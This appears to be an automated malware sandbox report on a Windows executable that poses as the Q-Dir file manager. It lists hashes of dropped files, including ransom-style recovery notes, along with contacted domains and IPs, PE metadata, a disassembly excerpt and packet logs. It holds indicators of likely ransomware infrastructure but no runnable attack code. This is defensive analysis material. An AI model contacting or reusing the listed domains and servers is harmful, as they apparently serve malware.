C:\Users\admin\AppData\Local\Temp\WPDNSE\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Temp\acrord32_sbx\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Temp\acrord32_sbx\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Temp\dd_NDP40-KB2468871-v2-x86_decompression_log.txt	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Temp\dd_SetupUtility.txt	Type: data MD5: 379F55D13ADD22E2EC7BFAC6DFFA88C1 SHA: 134E74C2C5FFEF368EAEA6B86998BD1B0FAAAD85 SHA-256: 2061C716DC45DC22577EEFFF868EF9C7D04FEFFB11534333AEC699B479DC5D01 SHA-512: 1FC20C725997F7830A35FF595ED7CE38C2D8F2D00969C840AC683AA850C1BB7D2EFE0CD906E4464574356C1FE6306A52AB2E85146323B2CC9AF48F7E8B7F2C26
C:\Users\admin\AppData\Local\Temp\dd_clwireg.txt	Type: data MD5: D41D8CD98F00B204E9800998ECF8427E SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709 SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855 SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
C:\Users\admin\AppData\Local\Temp\dd_wcf_CA_smci_20150723_110358_062.txt	Type: data MD5: 35796A95C0C28FB622389201D6E3B66D SHA: ED2704B2F2D2F501B18A9C480917D6DD236CC383 SHA-256: 2A068F4DC15957DDDB8A9A1EC9FBD4CA1BEBD671FC3E1766AFCF4A224C37CEAD SHA-512: 1CAE1190038851DC7878E9449FAB5AB20EF6B822F27A42F2C72A8656A7AF4F187394C7174B0A1EBC6468FD28531BA766B95062EEA50AEB089169F98E80C44042
C:\Users\admin\AppData\Local\Temp\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: BEA7E5F6A9B4EBA8F78EE2086C0F3DED SHA: F77F5E3988AA2D2ACA9B4ECDB92C2CE24C9FF638 SHA-256: 231E8D8FC9D707A28EF8BD82AB7D2AD0F30CE0ECA61D4A481647E5D029E434B0 SHA-512: A044B7980FD959E6446143EFEDF7E763F60906190A9AC8A28FAB6CDA38875A5D97C35F007E74974C8890C8B9862095593FDB6407253CFADC4CD8BCA280FA8E71
C:\Users\admin\AppData\Local\Temp\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: 3F3EFA647C43EADA869B7FAB98E55AA2 SHA: 291EB91C97DC3CED2221B01FFEE2A3409A377F2B SHA-256: 53887D38620C4994817A6C8087C877426EC7A7FCE96D7B2D59B0925843B47379 SHA-512: 0E9EBE55F7253CAE6A7BDEB6B7A1E84E1957DEA11451EBCBE8F7805E92ABF8E5400ED21D09E24AD56803AC331BDC75ACCB33E2B4AAFD4B5F3ADDE571B514B888
C:\Users\admin\AppData\Local\Temp\hsperfdata_admin\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Temp\hsperfdata_admin\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\Temp\msdtadmin\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\Temp\msdtadmin\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Local\help_recover_instructions+uuk.html	Type: HTML document, ASCII text, with very long lines MD5: 5F7969CE684D6EF4D2D49A9812E1A9D2 SHA: 828E843C8B32BFBF162D98C360DDEA585EFE5868 SHA-256: E5BB66408ED977A2EC8EF119279CB2567E2F1D034F5D1135B2D68BEF82C779D2 SHA-512: B4A887D6408188856F4CCAE365C6C6C2DF93340F228BE1F45366591F32A9637836A852B75CF816B4A834FF7F9046B827F6A993398C6B33C972E3C2A5BAF85592
C:\Users\admin\AppData\Local\help_recover_instructions+uuk.txt	Type: ASCII English text, with CRLF line terminators MD5: FA6F53AC8CB31FA0D3005D93CF788502 SHA: 2DDC440EC9B93B9DBD6AD56BB218EBF755425292 SHA-256: 8AB2BE87D43BD07398FDF868F167D9C10615613977B9F52721C2A0411E3D71C5 SHA-512: 2627552D6FEBA1D5F5DA3D1418D937F3BFAF1716F0A26E05C8D3AB0F91D231B02C49197AD0D665FEA5B7E18700637227AD3B76E8D1C4B1AE63836FE07B393565
C:\Users\admin\AppData\Roaming\amhfnhe45.exe	Type: PE32 executable (GUI) Intel 80386, for MS Windows MD5: 61F847BCB69D0FE86AD7A4BA3F057BE5 SHA: A59F1C9F4B99A73B794C23CB00A61666CAC7345E SHA-256: 63686978B3E7648BAE051320AE6CACB1F14FCDD74A9E78BE279D0A63A5CFD519 SHA-512: DD5E9C62FDFD007D0D5908E350EA758B0241746CF8985F861B131946D75CA3E244C6B2B43763F10D45F68EC9A8B1F0C0507EB60463D45C1E7B2BE959941DCEE1
C:\Users\admin\Documents\recover_file_bmrurerhv.txt	Type: ASCII text, with CRLF line terminators MD5: 6EBB1E927DDEB04420F107E5C2786C3D SHA: 11DFE37F6BE0DD472F8E2698001B740478221A1B SHA-256: 4C948B1308BB5C6ACE3F968BCC20822F26C5BD126B7D083A411C9901E5C230FC SHA-512: 6200DED633FBC45C95CA7BA7F010494EFC8F63420793F775F3077A8CB074D33CD6242285BB023C8BE62E847D6A3CD6494ADB1A68121F47FED3197E73414290E6
\srvsvc	Type: Hitachi SH big-endian COFF object, not stripped MD5: 1FF3DE735A87D719B35ED6D00689168C SHA: 6711956511BAB8C677A411EA33830E1A2139AC84 SHA-256: 36A192FDB029E0357EB75DF25BF3C2EF035DBCBB9B811527B7276C5CA6D2177E SHA-512: 1160A3480E574315832F8A9B60D0A6293A14D3A259EA3B6E220EEC46D72504C66AF2712A7CEF030F0E0F548845FD1AFC1FEC43985FE56614A6AF27FB75C3BA57

Contacted Domains/Contacted IPs

Contacted Domains

Name	IP	Active
topdrivers.org	185.24.99.98	true
ip.tyk.nu	144.76.253.225	true
partaci.info	176.106.190.60	true
tellambode.com	69.73.182.201	true
mengzhaoshituan.com	182.50.147.1	true

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name
144.76.253.225	Germany	24940	HetznerOnlineAG
176.106.190.60	Slovakia (SLOVAK Republic)	43451	RadioLANspolsro
8.8.8.8	United States	15169	GoogleInc
185.24.99.98	United Kingdom	23456	32bitTransitionAS
182.50.147.1	Singapore	26496	GoDaddycomLLC
69.73.182.201	United States	11042	LandisHoldingsInc

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	94-61f847bcb69d0fe86ad7a4ba3f057be5.exe
File size:	287232
MD5:	61f847bcb69d0fe86ad7a4ba3f057be5
SHA1:	a59f1c9f4b99a73b794c23cb00a61666cac7345e
SHA256:	63686978b3e7648bae051320ae6cacb1f14fcdd74a9e78be279d0a63a5cfd519
SHA512:	dd5e9c62fdfd007d0d5908e350ea758b0241746cf8985f861b131946d75ca3e244c6b2b43763f10d45f68ec9a8b1f0c0507eb60463d45c1e7b2be959941dcee1

File Icon

Static PE Info

General
Entrypoint:	0x409743
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x569F4C37 [Wed Jan 20 08:58:31 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	4e6d2f321b13bbba607d5cf1132d5501

Entrypoint Preview

Instruction
call 00007FCB8C80108Ch
jmp 00007FCB8C7FE6FDh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [00413EE0h+ecx*8]
je 00007FCB8C7FE895h
inc ecx
cmp ecx, 2Dh
jc 00007FCB8C7FE873h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007FCB8C7FE890h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [00413EE4h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007FCB8C800CF1h
test eax, eax
jne 00007FCB8C7FE888h
mov eax, 00414048h
ret
add eax, 08h
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0046DCB4h], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [0046DCB4h]
call 00007FCB8C800AF1h
pop ecx
test eax, eax
je 00007FCB8C7FE891h
push dword ptr [ebp+08h]
call eax
pop ecx
test eax, eax
je 00007FCB8C7FE887h
xor eax, eax
inc eax
pop ebp
ret
xor eax, eax
pop ebp
ret
mov edi, edi
push esi
push edi
xor esi, esi
mov edi, 0046DCC0h
cmp dword ptr [00414054h+esi*8], 01h
jne 00007FCB8C7FE8A0h
lea eax, dword ptr [00414050h+esi*8]
mov dword ptr [eax], edi
push 00000FA0h
push dword ptr [eax]
add edi, 18h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x129f0	0x4b0	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x117d4	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x76000	0x2f63c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x114d8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x10000	0x348	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Xored PE	ZLIB Complexity	File Type	Characteristics
.text	0x1000	0xe95d	0xea00	6.23333855926	False	0.56398571047	data	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x10000	0x2ea0	0x3000	5.2034083274	False	0.339111328125	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x13000	0x5b85c	0x1c00	5.71241320257	False	0.600725446429	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data5	0x6f000	0x4b0	0x600	0.0	False	0.0130208333333	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data4	0x70000	0x4b0	0x600	0.0	False	0.0130208333333	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data1	0x71000	0x320	0x400	0.0	False	0.0166015625	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.data3	0x72000	0x4b0	0x600	0.0	False	0.0130208333333	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x73000	0x4b0	0x600	0.0	False	0.0130208333333	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data2	0x74000	0x4b0	0x600	0.0	False	0.0130208333333	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data6	0x75000	0xc80	0xe00	0.0073937764232	False	0.00948660714286	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x76000	0x2f63c	0x2f800	6.0478504015	False	0.755807976974	data	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Xored PE
RT_GROUP_ICON	0x760e8	0x2f03d	MS Windows icon resource - 6 icons, 48x48, 256-colors	False
RT_VERSION	0xa5128	0x3b8	COM executable for DOS	False
RT_MANIFEST	0xa54e0	0x15a	ASCII text, with CRLF line terminators	False

Imports

DLL	Import
USER32.dll	SendMessageW, EnableScrollBar, PrintWindow, InsertMenuW, GetMenuItemCount, GetSubMenu, EnableMenuItem, CheckMenuItem, DestroyMenu, CreatePopupMenu, CreateMenu, SetMenu, GetMenu, EnableWindow, SetTimer, ReleaseCapture, SetCapture, GetKeyState, GetFocus, GetActiveWindow, SetFocus, EmptyClipboard, GetClipboardFormatNameW, SetWindowTextW, InvalidateRect, GetUpdateRgn, EndPaint, BeginPaint, ReleaseDC, GetDC, AllowSetForegroundWindow, TrackMouseEvent, SetForegroundWindow, RemoveMenu, TranslateMessage, DispatchMessageW, PeekMessageW, GetMessageTime, PostThreadMessageW, DefWindowProcW, MessageBoxW, InSendMessageEx, PostQuitMessage, EnumClipboardFormats, RegisterClipboardFormatW, GetClipboardData, SetClipboardData, CloseClipboard, IsIconic, SetWindowPlacement, GetWindowPlacement, SetWindowPos, UpdateLayeredWindow, ShowWindow, DestroyWindow, CreateWindowExW, RegisterClassExW, GetDoubleClickTime, TrackPopupMenu, PostMessageW, SetDlgItemTextA, PeekMessageA, wsprintfW, OpenClipboard, FindWindowExW, KillTimer, CreateWindowExA, MapWindowPoints, GetTopWindow, ScrollWindow, GetGUIThreadInfo, ToAsciiEx, CopyIcon, RealChildWindowFromPoint, CreateCaret, GetUserObjectInformationA, GetKeyboardLayoutNameW, MsgWaitForMultipleObjectsEx, IsMenu, GetMenuItemID, VkKeyScanA
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW, CommDlgExtendedError
ole32.dll	CreateOleAdviseHolder, CoRevokeClassObject
GDI32.dll	RestoreDC, SetWindowOrgEx, SetViewportOrgEx, Polygon, GetClipRgn, GetBkColor, GetTextMetricsW, Polyline, CreateCompatibleDC, SelectClipRgn, GetDeviceCaps, CreateRectRgnIndirect, SetWindowExtEx, Arc, TextOutW, CreateRectRgn, SaveDC, GetObjectW, GetCharABCWidthsI, CreateHatchBrush, GetBitmapBits, TranslateCharsetInfo, AbortDoc, EnumMetaFile, GdiTransparentBlt, SetDeviceGammaRamp, CreatePolyPolygonRgn, ModifyWorldTransform, SetPixelV, GdiAlphaBlend, GetLogColorSpaceW, GdiGradientFill, GetICMProfileW, SetMapMode, DPtoLP, LPtoDP, PolyBezier, CloseMetaFile
KERNEL32.dll	TlsAlloc, TlsGetValue, GetFileType, SetHandleCount, GetEnvironmentStringsW, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, WriteFile, ExitProcess, GetProcAddress, Sleep, GetModuleHandleW, SetUnhandledExceptionFilter, VirtualAlloc, HeapFree, VirtualFree, TlsSetValue, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, GetStartupInfoA, GetCommandLineA, HeapAlloc, HeapReAlloc, GetLastError, CreateHardLinkW, WaitForSingleObject, ReleaseSemaphore, SetThreadPriority, CopyFileA, IsBadReadPtr, EnumResourceNamesW, FindNextFileA, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, OpenProcess, lstrcmpA, MoveFileA, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapCreate, RequestWakeupLatency, GetWriteWatch, PurgeComm, LocalAlloc, ClearCommError, GetPriorityClass, GetLocalTime, SetFileAttributesW, LoadLibraryW, GetSystemDirectoryA, GetEnvironmentVariableA, RemoveDirectoryA, BeginUpdateResourceW

Version Infos

Description	Data
LegalCopyright	Copyright 2006-2014
InternalName	Q-Dir 6.05
FileVersion	6, 0, 5, 0
CompanyName	Nenad Hrg (SoftwareOK.com)
Company	Nenad Hrg (SoftwareOK.de)
PrivateBuild
LegalTrademarks
Comments
ProductName	Q-Dir SoftwareOK.com
SpecialBuild
ProductVersion	6, 0, 5, 0
FileDescription	Q-Dir
OriginalFilename	Q-Dir.exe
Translation	0x0407 0x04b0

Network Behavior

Network Port Distribution

Total Packets: 50
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2016 12:13:16.370547056 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:17.452605963 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:18.452392101 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:18.673100948 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:18.698231936 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:13:18.698271036 CEST	80	49162	144.76.253.225	192.168.1.12
May 12, 2016 12:13:18.698369026 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:13:18.699160099 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:13:18.699179888 CEST	80	49162	144.76.253.225	192.168.1.12
May 12, 2016 12:13:19.671772957 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:20.672578096 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:24.674092054 CEST	80	49162	144.76.253.225	192.168.1.12
May 12, 2016 12:13:24.674237967 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:13:24.706521034 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:25.706561089 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:26.708539963 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:27.673320055 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:27.676407099 CEST	49163	80	192.168.1.12	69.73.182.201
May 12, 2016 12:13:28.671799898 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:29.672569036 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:30.764070034 CEST	49163	80	192.168.1.12	69.73.182.201
May 12, 2016 12:13:36.766262054 CEST	49163	80	192.168.1.12	69.73.182.201
May 12, 2016 12:13:48.810797930 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:49.810376883 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:50.810842991 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:51.671499014 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:13:51.674124002 CEST	49164	80	192.168.1.12	182.50.147.1
May 12, 2016 12:13:52.672102928 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:13:53.673583984 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:13:54.677447081 CEST	49164	80	192.168.1.12	182.50.147.1
May 12, 2016 12:14:00.676810980 CEST	49164	80	192.168.1.12	182.50.147.1
May 12, 2016 12:14:12.730741978 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:13.730102062 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:14.730041981 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:15.673182011 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:15.677557945 CEST	49165	80	192.168.1.12	185.24.99.98
May 12, 2016 12:14:15.677613020 CEST	80	49165	185.24.99.98	192.168.1.12
May 12, 2016 12:14:15.677736998 CEST	49165	80	192.168.1.12	185.24.99.98
May 12, 2016 12:14:15.678674936 CEST	49165	80	192.168.1.12	185.24.99.98
May 12, 2016 12:14:15.678705931 CEST	80	49165	185.24.99.98	192.168.1.12
May 12, 2016 12:14:16.672250032 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:17.671446085 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:21.674299955 CEST	80	49165	185.24.99.98	192.168.1.12
May 12, 2016 12:14:21.674346924 CEST	80	49165	185.24.99.98	192.168.1.12
May 12, 2016 12:14:21.674576998 CEST	49165	80	192.168.1.12	185.24.99.98
May 12, 2016 12:14:21.675064087 CEST	49165	80	192.168.1.12	185.24.99.98
May 12, 2016 12:14:21.675101042 CEST	80	49165	185.24.99.98	192.168.1.12
May 12, 2016 12:14:21.690054893 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:22.690602064 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:23.690592051 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:24.673104048 CEST	53	60106	8.8.8.8	192.168.1.12
May 12, 2016 12:14:24.676107883 CEST	49166	80	192.168.1.12	176.106.190.60
May 12, 2016 12:14:25.672816992 CEST	53	60106	8.8.8.8	192.168.1.12
May 12, 2016 12:14:26.674338102 CEST	53	60106	8.8.8.8	192.168.1.12
May 12, 2016 12:14:27.681107044 CEST	49166	80	192.168.1.12	176.106.190.60
May 12, 2016 12:14:29.672120094 CEST	80	49162	144.76.253.225	192.168.1.12
May 12, 2016 12:14:29.672194004 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:14:33.673002958 CEST	49166	80	192.168.1.12	176.106.190.60
May 12, 2016 12:15:06.685921907 CEST	49162	80	192.168.1.12	144.76.253.225
May 12, 2016 12:15:06.685940027 CEST	80	49162	144.76.253.225	192.168.1.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2016 12:13:16.370547056 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:17.452605963 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:18.452392101 CEST	65121	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:18.673100948 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:19.671772957 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:20.672578096 CEST	53	65121	8.8.8.8	192.168.1.12
May 12, 2016 12:13:24.706521034 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:25.706561089 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:26.708539963 CEST	49386	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:27.673320055 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:28.671799898 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:29.672569036 CEST	53	49386	8.8.8.8	192.168.1.12
May 12, 2016 12:13:48.810797930 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:49.810376883 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:50.810842991 CEST	54517	53	192.168.1.12	8.8.8.8
May 12, 2016 12:13:51.671499014 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:13:52.672102928 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:13:53.673583984 CEST	53	54517	8.8.8.8	192.168.1.12
May 12, 2016 12:14:12.730741978 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:13.730102062 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:14.730041981 CEST	61255	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:15.673182011 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:16.672250032 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:17.671446085 CEST	53	61255	8.8.8.8	192.168.1.12
May 12, 2016 12:14:21.690054893 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:22.690602064 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:23.690592051 CEST	60106	53	192.168.1.12	8.8.8.8
May 12, 2016 12:14:24.673104048 CEST	53	60106	8.8.8.8	192.168.1.12
May 12, 2016 12:14:25.672816992 CEST	53	60106	8.8.8.8	192.168.1.12
May 12, 2016 12:14:26.674338102 CEST	53	60106	8.8.8.8	192.168.1.12

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 12, 2016 12:13:19.671984911 CEST	192.168.1.12	8.8.8.8	cf05	(Port unreachable)	Destination Unreachable
May 12, 2016 12:13:20.672704935 CEST	192.168.1.12	8.8.8.8	cf05	(Port unreachable)	Destination Unreachable
May 12, 2016 12:13:28.671986103 CEST	192.168.1.12	8.8.8.8	cf0a	(Port unreachable)	Destination Unreachable
May 12, 2016 12:13:29.672669888 CEST	192.168.1.12	8.8.8.8	cf0a	(Port unreachable)	Destination Unreachable
May 12, 2016 12:13:52.672246933 CEST	192.168.1.12	8.8.8.8	cf0f	(Port unreachable)	Destination Unreachable
May 12, 2016 12:13:53.673675060 CEST	192.168.1.12	8.8.8.8	cf0f	(Port unreachable)	Destination Unreachable
May 12, 2016 12:14:16.672379017 CEST	192.168.1.12	8.8.8.8	cf0a	(Port unreachable)	Destination Unreachable
